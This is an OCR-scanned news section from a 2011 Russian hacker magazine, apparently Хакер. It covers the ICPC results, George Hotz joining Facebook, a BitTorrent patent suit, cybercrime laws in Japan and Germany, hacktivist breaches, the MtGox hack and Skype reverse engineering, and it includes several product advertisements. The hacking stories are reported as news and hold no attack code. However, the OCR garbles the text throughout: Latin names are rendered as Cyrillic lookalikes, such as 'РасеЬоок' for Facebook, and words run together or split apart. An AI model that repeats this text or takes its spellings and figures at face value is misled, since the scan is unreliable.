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ФОКУС-ГРУППА 



Хочешь не только читать журнал, но и вместе с нами делать его лучше? Ука- 
зать на наши фейлы или выразить респект за сделанную работу? Это легко. 
Вступай в ряды нашей фокус-группы и выигрывай класные подарки отжур- 
нала и наших партнеров. 



3 самых активныхучастника фокус-группы получат в зтом месяце подписки 
на журнал Хакер: за первое место - на 12 месяцев, за второе - на 6 месяцев 
и за третье- на 3 месяца. 
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Есть ощущение, что этот год станет важной точкой в развитии 
российской ѵѵЫіеЬаІ-сцены. У нас огромная страна, и с хакерским 
генофондом полный порядок. Но вот незадача: на 142 млн. чело- 
век долгое время не было ни одной тематической конференции по 
информационной безопасности, в то время как даже в маленьких 
европейских странах такие конференции уже совсем не редкость. 
Ну и в целом активность российской публики пока очень скром- 
ная, ездят люди мало: не то что с докладом, айв роли туриста на 
международные конференции кто-либо заезжает крайне редко. 

То же самое и с внутренней активностью. Люди как-то привычно 
общаются в электронном формате, и перехода этого общения в 
реальный мир всем явно недостает. 

Силами многих замечательных людей ситуация начинает поти- 
хоньку меняться, что лично мне очень приятно. Не успела 
отшуметь конференция РНО, как уже на носу очередной СЬаоз 



Соп5І;гис1;іоп5 (27-28 августа в Питере). Плюс наши питерские 
друзья-вайтхеты организовали первую в России ПЕРСОМ-группу 
с понятным названием «ПЕЕСОМ-Риззіа». Парни раз в месяц 
проводят встречи, которые сопровождаются хорошими техниче- 
скими докладами на тему ІТ и информационной безопасности. 
Подробности тут: Ы:1:р://сІе1'соп-ги55Іа.ги . 

Люди — социальные существа, а вечно сидеть поодиночке за 
компьютерами — отстойная идея. Участвуя в офлайновых ивентах, 
ты встречаешь много разных и интересных людей, со многими из 
которых совершенно точно найдешь много общего. Все это благо- 
датная почва для общения, придумывания новых идей, ну и как 
минимум — просто гарантия хорошо проведенного времени. 

пікіІ022, ГЛ. ред. X 
ѵкоп*ак*е.ги/хакер_ппад 
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Обо всем 
за последний 
месяц 









именнотогда в стране начался переворот... В итоге, заключительный 
тур олимпиады имел место в США, в городе Орландо. Напоминаем, что 
Россию представляли 1 1 команд со всех уголков нашей страны. Первое 
место в этом году, увы, осталось за Китаем, чьи команды традиционно 
сильны — решитьбзадач быстрее и правильнее всехудалось ребятам 
изуниверситета Чжэцзян. На последующих местахтурнирнойтаблицы 
расположились: 

• университет Мичигана, США(8задач); 

• университет Цинхуа, Китай (7 задач); 

• Санкт-Петербургский государственный университет, Россия (7 задач); 

• Нижегородский государственный университет, Россия (7 задач); 

• Саратовский государственный университет, Россия (7 задач). 
Всехудивило столь блистательное выступление Мичигана, которое для 
многих стало настоящим сюрпризом, так как они не были даже в числе 
фаворитов. Что касается наших ребят, хоть они и не вошли в этом году в 
тройку, команды все равно заслужили золотые, серебряные и бронзовые 
медали, с чем мы их искренне поздравляем! 



ЗОЛОТО ІСРС- НАШЕ! 



Уже традиционные новости о ходе международной студенческой олимпи- 
ады по программированию. Финал ІСРС в этом году пришлось отложить, 
ведьон должен был состояться весной в Шарм-эль-Шейхе (Египет), но 



Місгозо^І Зесигііу Е$$еп(іаІ$ - наиболее используемый антивирус. Его 
используют на 10,66% из 43 000 компьютеров, протестированных ОРЗѴѴАТ 
по всему миру. Это немного превышает результаты второго места, которое 
занял Аѵіга Апііѵіг Регзопаі с показателем 1 0,1 0%. Бесплатный антивирус АѴАЗТ! 
оказался на третьем месте с 0,66%. 

6Е0Н0Т НАШЕЛ РАБОТУ 

Интересное обновление появилось на стене Джорджа «6еоНо1:»Хотца 
в РасеЬоок. Известный всей планете джейлбрейкер и активный борец 
с компанией 5опу написал следующее: «РасеЬоок — действительно 
потрясающее место для работы... первый хакерский марафон окончен» 

(«РасеЬоок із геаРу ап атагіпд ріасе Ь ѵѵогк... Ьгзі: ЬаскаіЬоп оѵег»). В 
скором времени эта информация подтвердилась. Цукерберг и компания 
действительно взяли эпатажного хакера на работу, притом довольно 
давно — Хотц с 9-го мая работает в РасеЬоок какзоРѵѵаге епдіпеег. То есть, 
крупнейшая социальная сеть планеты позвала беоНоІ; на работу через 
месяц после его судебного разбирательства с 5опу. Чем конкретно за- 
нимается Хотц на новом месте пока неизвестно, но можно предположить, 
что его найм связан с планами компании выйти на мобильный рынок. В 
РасеЬоокуже подтверждали ранее, что у них в разработке находится при- 
ложение для іРаб (удивительно, что его до сих пор нет), и его релиз уже не 
за горами. Вряд ли это совпадение, и известнейшего «яблочного» и не 
только джейл брейкера взяли на работу в компанию не поэтому. 
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МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ 
ПРЕДУПРЕЖДАЕТ; КУРЕНИЕ ВРЕДИТ 
ВАШЕМУ ЗДОРОВЬЮ 



•еклама 



МЕСАЫЕѴѴ5 



НАВІТШРЕМТПОДАЮТВСУД 



Крайне неприятный судебный иск 
был выдвинут против компании 
ВііТоггепІ:. Товарищи из Тгапг- 
5епб Вгоабсазбпд Меіѵѵогк наста- 
ивают, что ВііТоггепІ; Іпс и Копбкі 
Іпс нарушают патент 7.301 .944 
(«Распространение медиафайлов 
с использованием адаптивного 
протокола передачи») в реализа- 
ции протокола ВТТоггепТ Эти на- 
рушения якобы ведут к существен- 
ным потерям, и компания теперь 
требует компенсации ущерба. 

Что особенно важно — помимо 
приложения иТоггепТ рассма- 
тривается ущерб и от создания, 
использования и распростра- 
нения технологии ВТТоггепІ: как 
таковой! Упомянутый патент был 



зарегистрирован в ноябре 2007 
года, ВТО время какзаявка на 
него подавалась еще в апреле 
1 999 года, то есть, за два года 
до появления первой версии 
торрент-клиента ВКТоггепк Если 
Тгап2-5епб ВгоабсазОпд Меіѵѵогк 
сумеют доказать, что права на 
технологию действительно были 
запатентованы ими, а ВііТоггепІ 
заставят платить отчисления 
за каждую загрузку, это может 
нанести ущерб не только самой 
компании, но и всем пользова- 
телям Р2Р-сетей в целом. Ведь 
получается, что в таком случае 
даже само использование 
торрентов уже незаконно. Будем 
следить за развитием ситуации. 




» Сколько зарабатывают во «ВКонтакте»? Ежегодная выручка составляет 
$8-9 млн, примерно 60% приходится на таргетированную рекламу. 
Тридцать процентов выручки приносят приложения, еще десять - остальные 
сервисы. 




РОЗЕТКА С УДАЛЕННЫМ ДОСТУПОМ 



В наше время «умный дом» — уже не пустые 
слова и не оборот со страниц фантастиче- 
ских романов. Это реальность. Все больше 
бытовых приборов можно контролировать 
удаленно, так что в скором времени, по- 
жалуй, можно будет без шуток позвонить 
на холодильник или утюг :). Ну а благодаря 
сотовым операторам теперь можно еще 
и посылать 5М5 розетке. Уже начались 
продажи умной электро розетки с датчиком 
температур и дистанционным управлением 
«Мегафон 651 ». Девайс, производителем 
которого является китайская компания 
ЗепзеІТ, оснащается 65М-модулем с 
51 М- картой, так что им можно не только 
управлять и удаленно, но и получать от него 



ответные оповещения. Устройство способно 
самостоятельно информировать «хозяина» 
о включении или отключении электропри- 
боров и резком изменении температуры 
или достижении определенного предела 
(поддерживается диапазон температур от 
-1 о °С до 50 °С), что особенно актуально для 
владельцев кондиционеров. Интересно и то, 
что под девайс не придется штробить стены 
— 051 вставляется в обычную розетку, после 
чего у пользователя появляется возмож- 
ность дистанционно, с помощью мобильни- 
ка, управлять включением/выключением 
приборов и узнавать температуру в по- 
мещении. Цена новинки вместе старифом 
составляет 3 000 рублей. 



» 70% возвратов АпбгоісІ-смартфонов происходит из-за низкокачественных 
приложений, заявляет Моіогоіа. Большинство зтих приложений не 
тестировалось, и влияние их на аккумуляторы и СР11 не оценивалось в полной 
мере. 
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Двухъядерный процессор 1,2 Ггц 
задает новый уровень 
производительности 
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Толщина 8,49 мм 
определяет уникальный дизайн 




МЕСАЫЕѴѴ5 



ВИРУСОПИСАТЕЛЕЙ В ЯПОНИИ БУДУТ САЖАТЬ 



Недавно парламентЯпонии одо- 
брил новый закон против кибер- 
преступности, согласно которому 
создание, хранение и распро- 
странение компьютерных вирусов 
теперь будет караться штрафом 
или лишением свободы. Теперь 
в стране восходящего солнца за 
умышленное создание или рас- 
пространение малвари будут штра- 
фовать на бООтысяч иен (6,2тыся- 
чи долларов) или приговаривать 
ктюремному заключению на срок 
до трех лет. За хранение вирусов 
предусмотрен штраф в ЗООтысяч 
иен (3,7тысячи долларов) итюрем- 
ный срокдо двух лет. Таккакзакон 
ожидаемо вызвал волну народного 
негодования, власти особенно 
подчеркнули, что закон был до- 
полнен резолюцией стребованием 
избегать злоупотреблений. В то же 
время в Германии суд официально 



признал ООоЗуголовно наказуе- 
мым деянием. Суд Дюссельдорфа 
посчитал, что блокирование 
работы интернет-сайтов путем 
их преднамеренной перегрузки 
запросами запросто можетза- 
кончитьсятюремным сроком — до 
десяти лет лишения свободы. 
Такой приговор был вынесен еще 
в марте, когда слушалось дело о 
блокировке работы шести букме- 
керских сайтов, однако широкую 
огласкуон получил лишь сейчас. 
Судопирался на параграфЗОЗЬ 
уголовного кодекса Германии 
(«компьютерный саботаж»), за ко- 
торый предусмотрено наказание в 
виде лишения свободы на срокдо 
десяти лет. Учитывая тотфакт, что 
в Германии действует прецедент- 
ное право, ничего хорошего в 
будущем европейским ООоЗ’ерам 
ожидать не стоит. 





Представили управления «К» сообщают: количество преступлений 
совершенных при помощи интернета в 2011 году уже выросло на 95%. 



НОВОВВЕДЕНИЯ 600С1Е 



Роиг ѵѵауз То зеагсИ Ьу іппа§е 




Ога§ апсі сігор УрЕоасІ ап іта^е 



Про голосовой поискотбоодіе мы слышалиужедавно,таккаквпервые 
его представили еще в 2009 году. Теперь боодіе Ѵоісе Зеагсб наконец- 
то официально доступен не только юзерам АпбгоісІ, ЗутЬіап и І05, но 
и пользователям браузера боодіе Сбготе для персональных компью- 
теров. Да-да, без «Хрома» тут никуда, ведьтехнология, используемая 
в Сбготе, является закрытой. Таким образом, судитьотом, когда 
аналогичный функционал появится в других браузерах, пока довольно 
сложно. 

Второе новшество, о котором компания боодіе объявила в середине 
июня — это поиск по изображениям. Привычный боодіе Ітадез теперь 
обладает функционалом схожим сТіпЕуе. То есть, отныне можно за- 




Сору апсІ разТе ТЬе ияі Тог ап Р%і^№сІіск ап іта^е оп (Ке 
іта§е ѵѵеЬ 




грузить в поисковик картинку (или указать на изображение ссылку) и 
найти ее упоминание на различных веб-сайтах, отыскать похожие изо- 
бражения. Также можно будет распознавать здания по их фотографиям, 
музыкальные альбомы по их обложкам и та к далее. Впрочем, распозна- 
ватьлица людей новинка отказывается, что вполне объяснимо — до- 
статочно вспомнить, каким шквалом критики и обвинений в наруше- 
нии конфиденциальности и анонимности пользователей Сети была 
недавно встречена функция распознавания лиц на фото в РасеЬоок. 
Ооодіе это нововведениетоже не одобрил, а Эрик Шмит (председатель 
совета директоров боодіе) заявил, что подобным «корпорация Добра» 
никогда заниматься не будет. 
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ѴѴЕХІЕК.НОМЕ 903 

Много лет назад мы все заморачивались покупкой комьютера по частям и самостоятельно 
собирали его, посмеиваясь над производителями готовых сборок (и непременно теми, 
кто их покупает). Мол, и железо они подбирают не оптимальное, и продают втридорога. 
Романтика ЬапсІусгаІІ'а давно ушла, пришел простой расчет. Оказалось, что готовые сборки с 
установленной системой зачастую обходятся дешевле, чем собирать компьютер самому. Легче 
пойти в магазин и купить компьютер с классной конфигурацией за хорошую цену. В случае 
с ѴУ/ЕХІЕР.НОМЕ 903 с 64-битной ѴѴіпсіо\а/8® 7 на борту ты получаешь практически топовую 
машину, которая идеально подойдет для игр. 




В качестве процессора используется мощный двухядерный процес- 
сор Іпіеі® Соге™ І5-650 с частотой 3,2 ГГц и кэш-памятью 4 Мб. СРП 
имеет встроенный контроллер памяти и поддерживает технологию 
ТигЬо ВоозГ автоматически разгоняющую его под нагрузкой (напри- 
мер, в последних играх). Более того, такие процессоры поставляют- 
ся еще и со встроенным контроллером памяти. 

Видео 

За игровые возможности отвечают две видеокарты ОеГогсе ОТХ 460, 
основанные на новейшей вычислительной архитектуре «Гегті». 
Благодаря высокой производительности в режиме ВігесіХ 11 тес- 
селяции процессор ОТХ 460 обеспечивает идеально четкую гра- 
фику без ущерба для скорости, а поддержка технологий МѴЮІА ЗВ 
ѴІ5І0П™, РЬузХ® и СВВА™ позволяет визуализировать все самые 
потрясающие эффекты, на которые способны компьютерные игры. 
Просто выставляй настройки графики на максимум. 

ОЗУ 

Компьютер ѴѴЕХГЕР.НОМЕ 903 укомплектован оперативной памятью 
4 Гб, работающей в двухканальном режиме. Благодаря этому работа 



с каждым из двух установленных модулей памяти осуществляется 
параллельно. Пускай технология и не дает теоретического увеличе- 
ния пропускной способности в два раза, но, тем не менее, вносит 
ощутимый результат. 

Блок питания 

Набор мощного железа не может обойтись без надежного пита- 
ния. В ѴѴЕХЕЕР.НОМЕ электропитание осуществляется с помощью 
надежного блока питания мощностью 750 Вт. Это даже больше, чем 
нужно, но зато обеспечивает хороший запас надежности. 

Софт 

На всех компьютерах ѴѴЕХЕЕР.НОМЕ 903 предустановлена операци- 
онная система ѴѴіпсІоѵѵз® 7 Домашняя расширенная. Использование 
именно 64-битной версии не случайно: благодаря этому удается 
задействовать все 4 Гб установленной в компьютере памяти. Помимо 
ОС, дополнительно установлен бесплатный антивирус Місгозоі'і;® 
Эесигііу Еззепбаіз и ОІ'Гсе 2010 Зіагіег (включает в себя ограничен- 
ный функционал ѴѴогб® и Ехсеі®, для активации полнофункциональ- 
ной версии необходимо приобрести ключ продукта). 



ІІ 



МісюзоН 







ѴѴіпсІоѵѵз’У 

Домашняя расширенная 



Мы рекомендуем подлинную ОС ѴѴіпсІоѵѵз® 7. 
шехсег 

♦ 



ЗАО «БТК» — официальный дистрибутор 
техники ѴѴЕХЕЕР в России 
Единая служба поддержки ѴѴехІег: 

+7 ( 800 ) 200-9660 
ѵѵѵѵѵѵ.ѵѵехіег.ги 



© Владельцем товарного знака МісгозоГ® и логотипа ѴѴіпсІоѵѵз® 7, зарегистрированных на территории США и/или других стран, и владельцем авторских прав 
на его дизайн является корпорация Місгозо^І®. 



РЕКЛАМА 




МЕСАЫЕѴѴ5 



ДРАЙВЕРА НА АВТОМАТЕ 





Овѵісе йгіѵвг 



В Іпіеі ІаЬз, оказывается, вовсю кипит работа над созданием системы 
для автоматической генерации исходного кода драйверов устройств и 
их последующей адаптации для различных ОС. Об этом стало известно 
из интервью с Аруном Рагхунатом, который является одним из раз- 



работчиков этого чуда мысли. Технология пока носит название ТегтТе 
и призвана автоматизировать труд программистов, помочь людям 
избежать возможных ошибок в коде за счетавтоматизации их работы 
с помощью алгоритмов, используемых при создании систем искус- 
ственного интеллекта. Алгоритм работы ТегтТе основан на методах 
«теории игр». Драйвер выступает в роли первого игрока, а остальное 
окружение, к которому можно причислить 00 и устройство, — второго. 
Рагхунат поясняет: «Когда драйвер делает ход, окружение тоже меняет 
свое состояние. Выигрышная стратегия состоит в том, чтобы делать 
ходы по игровому полютаким образом, чтобы не ввести окружение в 
противоречивое или тупиковое состояние». Плюс этого подхода в его 
универсальности, можно перенести сгенерированный драйвер в дру- 
гую операционку, и для этого не потребуется ничего, кроме корректных 
спецификаций интерфейса драйверов для этой ОС. Данная технология 
была представлена впервые разработчиками из австралийского ис- 
следовательского центра МІСТА, Ореп Кегпеі ІаЬз и исследователями 
из университета Нового Южного Уэльса на симпозиуме 505Р. С их 
подробным докладом по данному вопросу можно ознакомиться здесь: 
Ыі.Іѵ/тЗсНѵІ: . 




Спустя два года после запуска, количество пользователей 
геолокационного сервиса Роигзриаге превысило 10 млн человек. 



ПЯТИМИНУТКА «ЯБЛОЧНЫХ» НОВОСТЕЙ 




Немало интересных сообщений пришло за 
прошедший месяц из стана компании Арріе. 
Во-первых, была названа дата выхода нового 
поколения операционной системы Мае 05Х 
под кодовым названием Ыоп. Старт произой- 
дет в уже в текущем месяце. ОС будет распро- 
страняться только через Мае Арр Сіоге по цене 
29,99 долларов. Нововведений много — более 
250 новых функций, многие из которых, кстати, 
были позаимствованы из мобильной І05. Вот 
некоторые их них: появилась поддержка новых 
мультитач -жестов и полноэкранных приложе- 



ний. Были добавлены функция Міззіоп Сопігоі 
для просмотра запущенных на компьютере 
программ в одном окне и панель СаипсбрасІ. 
ОС интегрировалась с магазином приложений 
Мае Арр Сіоге. Появилась утилита АігВгор для 
быстрого обмена файлами с другими компью- 
терами Мае по беспроводной сети. 

Во-вторых, не успел Арріе опубликовать бета- 
версию І05 5, какееуже взломали. На джейл- 
брейкушло менее 24 часов! Авторство рекорда 
принадлежит іРбопе ВеѵТеат. Парни сумели 
обойти систему цифровых подписей приложе- 



ний, и на устройство стало возможно установить 
любую программу. Когда будет выпущен джейл- 
брейк, пока не сообщается, но в качестве дока- 
зательств взломщики опубликовали скриншоты 
домашнегоэкрана і05 на плеере іРоб Іоисб. 
Среди стандартных иконокбыли иконки при- 
ложений Субіа и І55Н. Последнее дает корневой 
доступ кфайловой системе. 

В-третьих, об одной очень интересной 
инициативе рассказал Стив Джобс. В Арріе 
придумали, как можно монетизировать 
«пиратскую» музыку. Возможным это стало 
благодаря новому сервису іТипез Маіеб. 

Суть проста: новая функция зсап-апб-ппаісб 
(сканируй и найди) в іТипез поместит копии 
песен из библиотек пользователей в облако, 
где можно хранить треки всего за $25 в год 
и прослушивать их на любом устройстве. И 
неважно, откуда взялись эти песни — были 
ли они приобретены в ІТипез, извлечены из 
СВ или скачаны с файлообменных сетей. 

«Это приводит ксозданию модели, которая 
позволит людям делать деньги на пиратской 
музыке», — заявил Джефф Прайс, основа- 
тель и генеральный директор независимого 
музыкального дистрибьютора ТипеСоге. В 
общем и целом, это действительно похоже на 
схему, где «и волки сыты и овцы целы». Но, к 
сожалению, сомнительно, чтобы все борцы 
за авторское правотакже обрадовались этой 
инновации. 
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МЕСАЫЕѴѴ5 



У МОКІА ТЕПЕРЬ ЕСТЬ СВОЯ «АСЬКА» 



1 



сірйиииа 




Компания Мокіа, чей недавний альянс с 
МІСГ 050 І 1 : потряс многих, выпустила бес- 
платный мессенджер ІМ Іог Мокіа. Про- 
грамма ориентирована на смартфоны 
Мокіа Х6. Мокіа 5230, Мокіа М8. Мокіа Е7. 
аппараты Зегіез 40 и ряд других моделей 
компании. Скачать новинку можно через 
магазин Оѵі Сіоге. Разумеется, софтина 
не будет представлять собой закры- 
тый способ связи «только для нокий». 



мессенджер также поддерживает боодіе 
Таік, ѴѴіпбоѵѵз Ііѵе Меззепдег, УаЬоо! 
Меззепдег и другие сервисы обмена 
мгновенными сообщениями. Однако, 
похоже, это первый шаг в направлении, 
сходном с «яблочным» іМеззаде. При 
помощи этого приложения владельцы 
устройств с І05 5 на борту смогут обме- 
ниваться текстовыми сообщениями, 
фотографиями и видеороликами. 



» Корпорация ІСАММ проголосовала за разрешение введения доменных 
имен верхнего уровня, совпадающих с названием торговой марки. 

То есть, зоны вроде .арріе, или .іЬт не за горами. 



ХАКТИВИЗМ КРЕПЧАЕТ 




Карательные операции хакеров против 
компании 5опу словно послужили сигналом к 
действию для десятков, если не сотен, других 
хактивистов по всему миру. За последние ме- 
сяцы сообщения о взломах резко участились, и 
все чаще ответственность за хаки берут на себя 



различные группировки. Если абстрагировать- 
ся от многострадальной Зону (которую до сих 
пор не оставили в покое), то самыми громкими 
взломами последнего месяца можно назвать 
хаксервиса 5еда Равз и взлом сайта НАТО. 

В первом случае были скомпрометированы 
данные более 1 ,3 миллиона пользователей 
игрового онлайн-сервиса 5еда Разз. Сервис 
отключили, обнаружив, что неизвестные 
лица сумели получить доступ кбазе данных. 
Какая именно информация могла попасть 
в руки злоумышленников, пока не до конца 
ясно, но уже известно, что хакерам удалось 
получить етаіі юзеров, их даты рождения и 
пароли (в зашифрованном виде). Интересно 
и то, что другая группировка хактивистов под 
названием ЕиІгЗес, одеяниях которой мы 
обязательно расскажем тебе подробно в бли- 
жайшем номере, вызвалась помочьЗеда найти 



взломщиков. ЕиІгЗес, сами только взломав- 
шие ВеіЬезсІа, Міпіепсіо, сайт ЦРУ, сайтСената 
США и та к далее, заявили, что они очень любят 
□ геатсазі; и хотят помочь. Хотя, вероятно, это 
заявление тоже было сделано исключительно 
ради лулзов. 

Во втором случае пострадал сайт НАТС, а 
именно МАТС Е-ВоокзЬор. Учитывая, что 
меньше месяца назад НАТС недвусмыслен- 
но угрожали а нон и Мусы, обещая страшные 
кары, совпадение любопытное. С взломе 
стало известно, когда пользователей сервиса 
Е-ВоокзЬор оповестили, что хакеры, возмож- 
но, сумели заполучить клиентскую базу, и по- 
просили всех сменить пароли. Но та к как сайт 
не содержит никаких конфиденциальных или 
секретных данных, многие полагают, что цель 
для анонима была мелковата. Известно также, 
что НАТС ломали через Х55. 



ПЛАНШЕТ ДЛЯ СИСАДМИНОВ 



Необычное устройство представила компа- 
ния Еіике Меіѵѵогкз. ПланшетникСрбѴіеѵѵ 
ХС МеІѵѵогкАпаІузізТаЫеІ: ориентирован 
на сетевых инженеров и предназначен для 
решения серьезныхзадач. Новинка оснащается 
специализированным аппаратным комплек- 
сом для автоматизированного анализа сети и 
приложений. Барри Линдслей, менеджер по 
маркетингу компании Еіике Меіѵѵогкз, поясняет, 
что данноеустройство призвано помочь сете- 
вым администраторам определить, где именно 
имеется неисправность в данный момент: в 



сети или на уровне приложений. Производитель 
утверждает, что на сегодня нет другого девайса, 
который сочетал бы в себе способность произ- 
водитьанализ сетей 10 Гбит, атакже мониторинг 
и анализ беспроводных сетей. Аппаратвесит 
2,5 кг, имеетЮ, 25-ДЮЙМОВЫЙ экран разреше- 
нием 1024x738, время его работы —три часа 
отдвух батарей, заменяемых без выключения 
компьютера. Система работает на операционной 
системе ѴѴіпсІо\л/5 7, процессор ІпІеІСоге Оио 1,2 
ГГц. ОрОѴіеѵѵХб способен контролировать до 30 
000 конечныхустройств в сети и обрабатывать 




пакеты до 10 Гбит/с. Информационной панелью, 
отображающей основные данные, можно 
управляться и изменять ее взависимости от 
требований пользователя. 



► 012 
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Мы довольно давно рассказывали тебе о цифровой валюте Віісоіп, 
основанной на реег-іо-реег-технологии. Ее автор Сатоши Никамото хотел 
создать валюту, на которую не имела бы влияния ни политика банков, ни 



какие-либо внешние факторы. Увы, некоторые факторы на Віісоіп все же 
влияют. Например, хаки. Недавно был взломан крупнейший обменник 
ВС в Сети — МіСох, именно через него проходил основной объем торгов. 
Хакерам удалось «угнать» базу пользователей МіСох (а это более 60 тысяч 
аккаунтов), включая хэши паролей в формате МВ5. Известно, что пароль 
как минимум кодному из аккаунтов был подобран, и атакующие совершили 
отимени данного юзера операцию на бирже (максимальный размер пере- 
вода ограничен 1000 долларами вдень). Также после взлома, по каким-то 
неясным причинам, временно рухнул курс биткоинов: на бирже МЮохон 
упал с $17 до нескольких центов. Впрочем, сейчас курс в полном порядке, и 
это, видимо, можно списать на некиетехнические неполадки. Интересно, 
что после взломатакже была выявлена аномальная внешняятранзакция 
размером 432тысячи ВС, что равняется примерно $8 млн и составляет6,6% 
отобщего числа доступных в обороте биткоинов. С одной стороны, все это 
никоим образом нельзя поставить вупрексамой валюте. С другой, к Віісоіп 
достаточно вопросов и без этого инцидента. К примеру, ВС используется 
в качестве виртуальных акций финансовой пирамиды МММ-201 1 , и из- 
вестно, что курс валюты искусственно завышен и в любой момент можетоб- 
рушиться. Известнотакже, что существуюттрояны (в частности ІпЬзІеаІег. 
СоіпЬіІ:) для кражи кошельков Віісоіп, и ботнеты, позволяющие зарабаты- 
вать валюту В іісоіп. Словом, хитрая криптография не защищает необычную 
цифровую валютуотмошенников, а дырявые биржи, вынужденные прово- 
дить откаты и затыкать дыры, точно не принесугей хорошей рекламы. 



ИЩУТ ДАВНО, НО НЕ МОГУТ НАЙТИ... 



Компания Міеговоі"!: совсем недавно расквиталась с огромным ботнетом 
ВизЬск, а теперь намеревается осудить его хозяев. Однако для начала 
ихеще нужно найти. Тот факт, чтоличности организаторовзомби-сети 
установлены не были, не остановил МісгозоІІ: от подачи судебного иска. 
Проведенное компанией расследование показало, что следы спамеров 
(ботнет рассылал миллиарды сообщений ежедневно, чаще всего ихтемой 
были фэйковые лотереи и фарма) ведутв Россию. Атаккакамериканское 
законодательствотребует проинформировать ответчика о дате и месте 
слушания, Міегозоб: разместила в российских газетах «Деловой Петер- 
бург» и «Московские новости» объявления с датой, местом и временем 
проведения слушаний по делу ботсети РизЬск. Реклама на четверть 



полосы будет выходить в течение месяца. В Міегозоі"!; искренне полагают, 
что создатели ботнета все же явятся в суд, чтобы отстоять свои интересы. 

С той же целью был создан сайт побсеофіеасііпдз. сот , на котором пред- 
ставлены материалы по этому делу. Плюс на все почтовые и электронные 
адреса, которые использовались для создания и управления ботнетом, 
были отправлены соответствующие уведомления. С одной стороны ясно, 
что кэтому обязываетзаконодательство, но с другой, это все равно чер- 
товски трогательно и смешно :). Напомним, что компьютеры, входившие в 
сеть РизЬск, втечение нескольких лет (с 2006 года) отправляли несколько 
миллиардов спам-сообщений вдень. Чаще всего это были сообщения о 
лотереях и реклама медицинских препаратов. 



РасеЬоок, похожСр достиг пика своего роста и начал сдавать назад. В США 
соцсеть потеряла около 6 млн пользователей (с 155,2 млн в начале мая - 
до149,4млнвконце). 

ЕЩЕ одно ВСКРЫТИЕ 8КУРЕ 





Закрытый протокол Зкуре словно запретный плод — он все манит 
и манит исследователей. Пока все гадают, выдаст ли МісгозоІІ; ис- 
ходный код проекта спецслужбам (в рамках программы Ооѵегптепі: 
Зесигііу Ргодгат) после приобретения проекта, независимые ис- 
следователи выкладывают в Сеть свои наработки. Тридцатилетний 
фрилансер Ефим Бушманов из Сыктывкара разместил в своем блоге 
( зкѵре-ореп-зоигсе.ЫодзроТсопп ) отреверсенный код скайпа (для 
версии 1 .х/3.х/4.х), а также раскрыл применяющийся в нем алгоритм 
шифрования данных (как выяснилось, используется надежное шиф- 
рование АЕ5 и Р5А с публичным ключом). Помимо этого он опубли- 



ковал исходный код клиента, который может отправить сообщение 
другим клиентам Зкуре, правда, для устаревшей версии протокола. 

В блоге он написал, что ищет единомышленников, которые рас- 
полагают достаточным запасом времени для того, чтобы завершить 
проект. Увы, впоследствии ссылки на файлы из блога были удалены, 
что вероятнее всего связано с тем фактом, что несанкционированное 
использование кода сервиса приравнивается к нарушению прав 
Зкуре на интеллектуальную собственность. Тем не менее, в Сеть 
исследования хакера утекли, и их все еще можно обнаружить на 
крупных торрент-трекерах. 
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Не знаю, возникала ли утебя, дорогой читатель, 
такая проблема, но иногда хочется сходить в 
кино на какой-либо фильм, а эту ленту везде по- 
казывают исключительно и только в 30. Согла- 
сись, стереокартинка далеко не всегда бывает 
хороша (особенно натолком ненастроенной 
аппаратуре наших кинотеатров), уместна, да и 
вообще, отЗОу многихустаютглаза, болит голо- 
ва и творятся другие неприятные вещи. Также 
нельзя не заметить, что фильмы, снятые в 30, 
это одно, а фильмы в него конвертированные, 

— совсем другое. Ценность последнего весьма 
спорна. Однако обычный, не объемный формат 

— порой настоящая редкость. Те, кого такой 



расклад не устраивает, придумали, каксделать 
очки, конвертирующие изображение обратно 
в 20. Все предельно просто. Тебе понадобятся 
л ишь две пары обыкновенных поляризацион- 
ных очков, каждая из которых стоит в районе $5 
или дешевле (а еще их часто раздают на халяву 
в кинотеатрах). Какты помнишь, каждый глаз в 
таких очках видиттолько свою картинку: левый 
— для левого глаза, правый — для правого. Весь 
фокус втом, чтобы путем нехитрых манипуля- 
ций, переставить линзы таким образом, чтобы 
в одной паре очков оказалисьдве левых линзы, 
а в другой две правых. И никакого большеЗВ и 
насилия над глазами! 




«Каждый четвертый американский хакер работает на ФБР», - заявляет 
Эрик Корли, который издает ежеквартальный журнал «2600». 



ѴѴЕХІЕКТАВ 9701 



Кажется, каждый производитель считает 
должным выпуститьсвой планештник, при- 
чем непременно на андроиде. Воти ѴѴехІег 
объявила о релизе планшетного компьютера на 
базе Апбгоіб 2.3 - ѴѴЕХІЕВ.ТАВ 9701 . Специфи- 
кации довольно стандартные для такого рода 
устройств: 

• АВМ-процессор с частотой 1 ,2 ГГц; 
•512М603У; 

• 9,7” 5ирегТЕТ-экран с разрешением 1024x768 
выполнен потехнологии ІР5 и поддерживает 
мультитач; 

• 8 Гб внутренней флеш-памяти. 

Такого конфига, в частности, достаточно, чтобы 
воспроизводить видеоконтент 1 080р (ЕиШНО). 



Причем изображение можно даже вывести на 
внешниеустройства отображения (ТВ, монитор, 
плазменная панель), используется тіпі-НОМІ- 
выход. Для удобства пользователей в планшете 
реализована функция подключения внешних 
иЗВ-накопителей. Для выхода в Сеть исполь- 
зуются модули (ІЕЕЕ 802.1 1 Ь/д/п) и ЗС (стан- 
дарта ѴѴібеЬапб Собе Віѵізіоп МиШрІе Ассезз). 
Новинка оснащена датчиком положения в 
пространстве (С-сенсор) и 6Р5-приемником, 
поддерживающим функцию А-СР5. Какза- 
являет производитель, литий-полимерного ак- 
кумулятора емкостью 7000 мАч хватит на более 9 
часов без подзарядки (в режиме использования 
сети интернете включенным модулем ѴѴі-Еі). 




Планшетвыполнен в стильном эргономичном 
корпусе толщиной от 12 мм, а его вес не превы- 
шает700 г. Поставки начнутся в сентябре 201 1 
года по ориентировочной розничной цене — 
13,900 рублей. 




Ожидается, что прибыли компании Кеб На( в зтом году (по итогам года) 
достигнут рекордной отметки в $1 млрд. 



ДЕНЬГИ С он-кодом 




Еще относительно недавно СР-коды были 
забавой для гиков и энтузиастов, а широкие 
массы понятия не имели, что это такое. Но 
эти времена явно остались в прошлом, а эта 
новость — лишнеетому подтверждение. Коро- 
левский монетный двор Нидерландов выпустил 
первую в мире монету с ОР-кодом. Разумеется, 
монета коллекционная, не массовая, но все 
же. Выход необычного серебряного дензнака 
номиналом в 5 евро приурочен кстолетнему 



юбилею монетного двора в Утрехте. В след за 
этой монетой выйдет и еще одна, уже золотая, 
номиналом в 10 евро. Всего их будетвыпущено 
201 1 штук. Под ОР-кодом размещается ссылка 
на сайт Королевского монетного двора: ѵѵѵѵѵѵ. 
